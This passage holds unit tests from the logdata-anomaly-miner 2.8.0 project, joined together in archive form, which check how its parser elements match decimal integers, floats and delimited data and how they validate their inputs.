DecimalFloatValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=set()) def test10exponent_type_input_validation(self): """Check if exponent_type is validated.""" DecimalFloatValueModelElement(self.id_, exponent_type="none") DecimalFloatValueModelElement(self.id_, exponent_type="optional") DecimalFloatValueModelElement(self.id_, exponent_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, exponent_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalFloatValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DecimalIntegerValueModelElementTest.py000066400000000000000000000631661500476301700330150ustar00rootroot00000000000000import unittest from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DecimalIntegerValueModelElementTest(TestBase): """Unittests for the DecimalIntegerValueModelElement.""" id_ = "integer" path = "path" def test1get_match_element_default_values(self): """Test valid integer values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) data = b"22.25 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"0.25 some string." value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22. some string" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test2get_match_element_default_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e-5" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e+0" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_optional_zero_values(self): """Test valid float values with "optional" or "zero" values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO) data = b"22.25 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"-22.25 some string." value = b"-22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22, None) data = b"0.25 some string." value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22. some string" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"025 some string" value = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025.22 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"1e-5 some string" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"1e+0 some string" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"00 some string" value = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test4get_match_element_optional_zero_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5get_match_element_mandatory_blank_values(self): """Test valid float values with "mandatory" or "blank" values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK) data = b"+22.25 some string." value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"-22.25 some string." value = b"-22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22, None) data = b"+0.25 some string." value = b"+0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"+22 some string." value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"+22. some string" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"+ 25 some string" value = b"+ 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"- 25 some string" value = b"- 25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25, None) data = b"+1e-5 some string" value = b"+1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+1e+0 some string" value = b"+1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+ 1e+0 some string" value = b"+ 1" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+0 some string" value = b"+0" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test6get_match_element_mandatory_blank_values_no_match(self): """Test not matching values with default values of value_sign_type and value_pad_type.""" decimal_integer_value_me = DecimalIntegerValueModelElement( self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK) data = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+ 22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"- 22.25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+22,25" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22,25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22.12.2021 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" +25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" -25" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"no number 22 some string." match_context = DummyMatchContext(data) match_element = decimal_integer_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DecimalIntegerValueModelElement, "") # empty element_id self.assertRaises(TypeError, DecimalIntegerValueModelElement, None) # None element_id self.assertRaises(TypeError, DecimalIntegerValueModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalIntegerValueModelElement, set()) # empty set element_id is not allowed def test9value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalIntegerValueModelElement(self.id_, value_sign_type="none") DecimalIntegerValueModelElement(self.id_, value_sign_type="optional") DecimalIntegerValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=set()) def test10value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalIntegerValueModelElement(self.id_, value_pad_type="none") DecimalIntegerValueModelElement(self.id_, value_pad_type="zero") DecimalIntegerValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalIntegerValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DelimitedDataModelElementTest.py000066400000000000000000000463611500476301700316340ustar00rootroot00000000000000import unittest from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DelimitedDataModelElementTest(TestBase): """Unittests for the DelimitedDataModelElement.""" id_ = "delimited" path = "path" delimiter = b"," def test1get_match_element_single_char(self): """A single character is used as delimiter and not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a") value = b"this is " match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c") value = b"this is a mat" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e") value = b"this is a match cont" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n") value = b"this is a match context." match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_single_char_no_match(self): """A single character is used as delimiter and not matched.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode()) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3delimiter_string(self): """In this test case a whole string is searched for in the match_data and it is not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"th" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match " match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"t" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"his is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test4delimiter_string_no_match(self): """In this test case a whole string is searched for in the match_data with no match.""" data = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5special_characters_escape(self): """In this test case special character escaping is tested. The delimiter is not consumed (consume_delimiter=False).""" data = b'error: the command \\"python run.py\\" was not found" ' value = b'error: the command \\"python run.py\\" was not found' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = rb"^This is a simple regex string. It costs 10\$.$" value = rb"^This is a simple regex string. It costs 10\$." match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"the searched file is .gitignore." value = b"the searched file is .gitignore" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test6special_characters_escape_no_match(self): """In this test case special character escaping is tested without matching.""" data = b'error: the command \\"python run.py\\" was not found\\" ' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = rb"^This is a simple regex string. It costs 10\$.\$" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"the searched file is .gitignore ." match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7consume_delimiter(self): """In this test case check if the consume_delimiter parameter is working properly.""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a", consume_delimiter=True) value = b"this is a" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c", consume_delimiter=True) value = b"this is a matc" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e", consume_delimiter=True) value = b"this is a match conte" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n", consume_delimiter=True) value = b"this is a match context.\n" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"his is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test8consume_delimiter_no_match(self): """In this test case check if the consume_delimiter parameter is working properly and does not match data.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode(), consume_delimiter=True) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test9element_id_input_validation(self): 